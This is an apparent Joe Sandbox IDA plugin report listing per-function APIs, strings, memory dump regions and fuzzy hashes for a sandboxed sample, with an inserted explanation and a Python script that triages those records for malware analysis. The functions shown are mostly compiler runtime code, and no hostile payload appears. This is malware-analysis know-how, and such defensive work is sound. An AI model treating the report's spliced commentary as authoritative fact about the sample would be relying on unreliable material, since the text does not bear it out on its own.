                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                                          • Instruction ID: c76fa301f83e401992b52f562859a7f8a67b5303f66928619ad53c47dbea018a
                                                          • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                                          • Instruction Fuzzy Hash: 9721F7326011248FC741EF6ADA8469B73E6FFC8375F67C63EDD8147A45C631E60686A0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction ID: f1122b930420fc929096ffb121788ea739d45b140c881f3f04b8876e4ca5122c
                                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction Fuzzy Hash: 23E08C72A12638EBCB15EBC8C940D8AB3ECEB45B49B21009AF501E3610D271DE41CBD8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                          • API String ID: 3519838083-609671
                                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction ID: 80bfe25fff8a158052693c84830db928a8aac86fdede578ff2a66daff3c4240a
                                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction Fuzzy Hash: 21D1E831A05209DFDF11CFA4D990BEDBBB6FF05308F244519E065A3A50DB70A90ACBAD
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,6C6AB0D0,?), ref: 6C6ABEF9
                                                          • __fassign.LIBCMT ref: 6C6AC0D8
                                                          • __fassign.LIBCMT ref: 6C6AC0F5
                                                          • WriteFile.KERNEL32(?,6C6B5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6AC13D
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C6AC17D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6AC229
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID: Dt*%
                                                          • API String ID: 4031098158-1118161045
                                                          • Opcode ID: be4f5f056d5142a7a42d33d35b7e28b1ab8f910f67f4bea8c245002956afb011
                                                          • Instruction ID: 58efd710eaa4b47862e59f8cdc7b6cb603d8023523cd01503a2f02f652400a8a
                                                          • Opcode Fuzzy Hash: be4f5f056d5142a7a42d33d35b7e28b1ab8f910f67f4bea8c245002956afb011
                                                          • Instruction Fuzzy Hash: ADD17C71E05258AFCF15CFE8C8809EDBBB5BF49318F280169E856BB341D6329D46CB58
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699B07
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C699B0F
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699B98
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C699BC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699C18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: Dt*%$csm
                                                          • API String ID: 1170836740-3798115597
                                                          • Opcode ID: 3f988b6962209065d067a87128b79213c58f2af0bfa0016d99225a6b7cd24fde
                                                          • Instruction ID: d178e04b6a97be1ec1bc9cc208560e41363aec9ffcb198cebfc75c52e7eefb7d
                                                          • Opcode Fuzzy Hash: 3f988b6962209065d067a87128b79213c58f2af0bfa0016d99225a6b7cd24fde
                                                          • Instruction Fuzzy Hash: 9641B430A1121AAFCF00DF68C880AAE7BB5AF4732CF148155E81D9B755D735DA16CB9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: 4f112b2d5c2813a24cc123141c7b73da2ead5a485ffb6f3dd2b1e3e0ca0e032c
                                                          • Instruction ID: 49d2b7f47931183a756c1b48936e88eaa138eea22c5b422338f29c8a698e170d
                                                          • Opcode Fuzzy Hash: 4f112b2d5c2813a24cc123141c7b73da2ead5a485ffb6f3dd2b1e3e0ca0e032c
                                                          • Instruction Fuzzy Hash: 2221EB32A16221BBDB118BEDCC84A9A3779DB0F768F150651E815E7AC0D770DD0386ED
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C562F95
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C562FAF
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C562FD0
                                                          • __Getctype.LIBCPMT ref: 6C563084
                                                          • std::_Facet_Register.LIBCPMT ref: 6C56309C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C5630B7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                          • String ID:
                                                          • API String ID: 1102183713-0
                                                          • Opcode ID: 94522d6c1218ef7953e828d0142aee27e5fbf510ca75b5352603dbfb722ba387
                                                          • Instruction ID: c04869fa4305656344cf5b2fff3e6801def2fcb226001355bb9cf45d85f73aa1
                                                          • Opcode Fuzzy Hash: 94522d6c1218ef7953e828d0142aee27e5fbf510ca75b5352603dbfb722ba387
                                                          • Instruction Fuzzy Hash: D34188B1E04219CFCB10CFA6C855B9EB7B0FF49728F044128D869ABB60D735A909CBD4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$__aullrem
                                                          • String ID:
                                                          • API String ID: 2022606265-0
                                                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction ID: 7ecbd0328392e228d6d0b0a3daab071bd7f34b564b66097c5c3856106da1b41f
                                                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction Fuzzy Hash: B121CEB0901219BFDF208F958D48DDF7A79EF817E8F218226B92061E90D6719DA0C6A5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6DA6F1
                                                            • Part of subcall function 6C6E9173: __EH_prolog.LIBCMT ref: 6C6E9178
                                                          • __EH_prolog.LIBCMT ref: 6C6DA8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: IJ$WIJ$J
                                                          • API String ID: 3519838083-740443243
                                                          • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction ID: 13c88dd3ee55a7c9d065eec9b4becd51bff86b1ca26f016438f0bbef7da59fde
                                                          • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction Fuzzy Hash: FD71B030A08255DFDB14CF64C484BEDB7B0FF15308F1180A9D855ABB92CB78BA49CB99
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C562A76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: U#Vl$q!Vl$Jbx$Jbx
                                                          • API String ID: 4194217158-2877385751
                                                          • Opcode ID: 8a00e6d5a4721ca10132ea5111928b7df94fd796b5b59279e7a5d620148b5e10
                                                          • Instruction ID: 4a7ffedfabc6a1d5b566e02de5546ae7e255bd911373baadc0f242cc5469d977
                                                          • Opcode Fuzzy Hash: 8a00e6d5a4721ca10132ea5111928b7df94fd796b5b59279e7a5d620148b5e10
                                                          • Instruction Fuzzy Hash: 515124B1D002049FCB10CF5ACC84A9EBBB5EF89318F14856EE8499BB51E371D985CF92
                                                          APIs
                                                          • _free.LIBCMT ref: 6C6B5ADD
                                                          • _free.LIBCMT ref: 6C6B5B06
                                                          • SetEndOfFile.KERNEL32(00000000,6C6B46EC,00000000,6C6AB0D0,?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000), ref: 6C6B5B38
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000,?,?,?,?,00000000,?), ref: 6C6B5B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID: 8Q
                                                          • API String ID: 1547350101-4022487301
                                                          • Opcode ID: cbb5cf5c7581d6eb10cbb978bb10da8fea9c9b6ab1ccefe8f8216ac3c3080306
                                                          • Instruction ID: f0bd50eba1d78fc0c533c4568492b079c048ae9e45bdba5b014e617e50bdb63a
                                                          • Opcode Fuzzy Hash: cbb5cf5c7581d6eb10cbb978bb10da8fea9c9b6ab1ccefe8f8216ac3c3080306
                                                          • Instruction Fuzzy Hash: 5941E932500645ABDB019BB9CC81BDE3BB5EF4A328F250511F424F7B90EB74C865876D
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6EE41D
                                                            • Part of subcall function 6C6EEE40: __EH_prolog.LIBCMT ref: 6C6EEE45
                                                            • Part of subcall function 6C6EE8EB: __EH_prolog.LIBCMT ref: 6C6EE8F0
                                                            • Part of subcall function 6C6EE593: __EH_prolog.LIBCMT ref: 6C6EE598
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: &qB$0aJ$A0$XqB
                                                          • API String ID: 3519838083-1326096578
                                                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction ID: 57fa9c67220d83222f03931ed9930e49bd335881ca7696f221d62917c27c0fa3
                                                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction Fuzzy Hash: 10218B71E05258EACB05DBE5D9949EDBBB4EF16318F20402AE41267781DB781E0CCB59
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F13F
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C69F152
                                                          • FreeLibrary.KERNEL32(00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                           • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
                                                          • Instruction ID: 6224938498c916a2524aeab28b19f28082148744072382027e5e6e324255b5ec
                                                          • Opcode Fuzzy Hash: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
                                                          • Instruction Fuzzy Hash: 7BF01C31601619FBDF02EB91C949FAE7A79EB0575AF210065F815E2560CB708B40DAD9
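The function records above are the Joe Sandbox IDA plugin's per-function output for process 7: the APIs each function calls (with the module that resolves them and the call-site address), the strings it references, the memory dump region it was carved from, and the opcode/instruction identifiers used for similarity pivots. Most of what is listed here is compiler runtime, not sample logic: `_ValidateLocalCookies`, `___except_validate_context_record`, `__EH_prolog`, the `std::_Lockit` facet registration and, less obviously, the `GetModuleHandleExW("mscoree.dll")` / `GetProcAddress("CorExitProcess")` / `FreeLibrary` triple, which is the MSVC CRT's `exit()` path giving a loaded .NET runtime the chance to shut down first. The following triage helper is an added example, not part of the report or of Joe Sandbox's tooling. It assumes the plain-text layout shown on this page (one bullet per field, an entry ending at its Instruction Fuzzy Hash); the sample input is three entries copied from the page and trimmed to the fields used, and the `runtime`/`review` split is a coarse heuristic (Win32 imports next to LIBCMT helpers, such as the `GetConsoleCP`/`WriteFile` pair, still land in `review` and have to be checked by hand).

```python
import re
from collections import Counter

# Constructed sample: three function entries copied from the report above,
# trimmed to the fields this script uses (APIs, Memory Dump Source, Similarity).
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F13F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C69F152
• FreeLibrary.KERNEL32(00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F175
Memory Dump Source
• Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
• Opcode Fuzzy Hash: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
• Instruction Fuzzy Hash: 7BF01C31601619FBDF02EB91C949FAE7A79EB0575AF210065F815E2560CB708B40DAD9
APIs
• GetConsoleCP.KERNEL32(?,6C6AB0D0,?), ref: 6C6ABEF9
• __fassign.LIBCMT ref: 6C6AC0D8
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C6AC17D
Memory Dump Source
• Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLast
• String ID: Dt*%
• Instruction Fuzzy Hash: ADD17C71E05258AFCF15CFE8C8809EDBBB5BF49318F280169E856BB341D6329D46CB58
APIs
• __EH_prolog.LIBCMT ref: 6C6DA6F1
  • Part of subcall function 6C6E9173: __EH_prolog.LIBCMT ref: 6C6E9178
Memory Dump Source
• Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
Similarity
• API ID: H_prolog
• String ID: IJ$WIJ$J
• Instruction Fuzzy Hash: FD71B030A08255DFDB14CF64C484BEDB7B0FF15308F1180A9D855ABB92CB78BA49CB99
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally prefixed by "Part of subcall function X:"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9_]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SRC_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
RUNTIME_MODULES = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}  # MSVC CRT / STL helper libraries

def parse_entries(text):
    """Split the report text into one dict per function; an entry ends at its Instruction Fuzzy Hash."""
    entries, cur = [], {"apis": []}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["module"], m["ref"]))
            continue
        m = SRC_RE.search(line)
        if m:
            cur["source_file"], cur["offset"] = m["file"], m["offset"]
            continue
        m = FIELD_RE.match(line)
        if m:
            key = m["key"].strip().lower().replace(" ", "_")
            cur[key] = m["val"].strip()
            if key == "instruction_fuzzy_hash":  # last field of every entry
                entries.append(cur)
                cur = {"apis": []}
    return entries

def triage(entry):
    """Coarse verdict: 'runtime' for CRT/STL-only code, 'review' when a Win32 import is present."""
    modules = {mod for _, mod, _ in entry["apis"]}
    if modules <= RUNTIME_MODULES:  # also true for entries that list no APIs at all
        return "runtime"
    # mscoree.dll + CorExitProcess + FreeLibrary is the MSVC CRT exit() path, not sample logic.
    if "CorExitProcess" in entry.get("string_id", ""):
        return "runtime"
    return "review"

def summarize(text):
    """Return (entries, functions per dump region, review-worthy Win32 imports keyed by fuzzy-hash prefix)."""
    entries = parse_entries(text)
    per_region = Counter(e["offset"] for e in entries)
    review = {
        e["instruction_fuzzy_hash"][:8]: [(n, r) for n, mod, r in e["apis"] if mod not in RUNTIME_MODULES]
        for e in entries if triage(e) == "review"
    }
    return entries, per_region, review

def opcode_id_duplicates_fuzzy_hash(entries):
    """In this report the Opcode ID always equals the Opcode Fuzzy Hash, so it is not a second pivot."""
    pairs = [(e["opcode_id"], e["opcode_fuzzy_hash"]) for e in entries if "opcode_id" in e]
    return bool(pairs) and all(a == b for a, b in pairs)

if __name__ == "__main__":
    entries, per_region, review = summarize(SAMPLE)
    print(f"{len(entries)} functions, per region: {dict(per_region)}")
    for prefix, calls in review.items():
        print(f"review {prefix}: " + ", ".join(f"{n}@{r}" for n, r in calls))
```

Run it against the full function listing (saved as text) to get the handful of functions worth opening in IDA: those whose Win32 imports are not wrapped by LIBCMT helpers. The `opcode_id_duplicates_fuzzy_hash` check is there because the report prints both fields for every function but they carry the same value here, so pivoting on one of them is enough.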
                                                          APIs
                                                          • __EH_prolog3.LIBCMT ref: 6C69732E
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C697339
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6973A7
                                                            • Part of subcall function 6C697230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C697248
                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C697354
                                                          • _Yarn.LIBCPMT ref: 6C69736A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                          • String ID:
                                                          • API String ID: 1088826258-0
                                                          • Opcode ID: eeea89e8a8f5e4c2e0034faa40115d96900bc43df7c5f23c14947f08b1b49d80
                                                          • Instruction ID: c5f6b32c05ddaeaa91b770e778552ce8b71561991742cb020b5e6fa3b7ebaf47
                                                          • Opcode Fuzzy Hash: eeea89e8a8f5e4c2e0034faa40115d96900bc43df7c5f23c14947f08b1b49d80
                                                          • Instruction Fuzzy Hash: 5E018F757046129BDB06DF20C9509BD77B1FF86254B150019D81297780CF34AA57DFDD
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $!$@
                                                          • API String ID: 3519838083-2517134481
                                                          • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction ID: 597da4678fc8ce171bb8b15fbb5a0755b197eccbbbc982d3ede8750080274d40
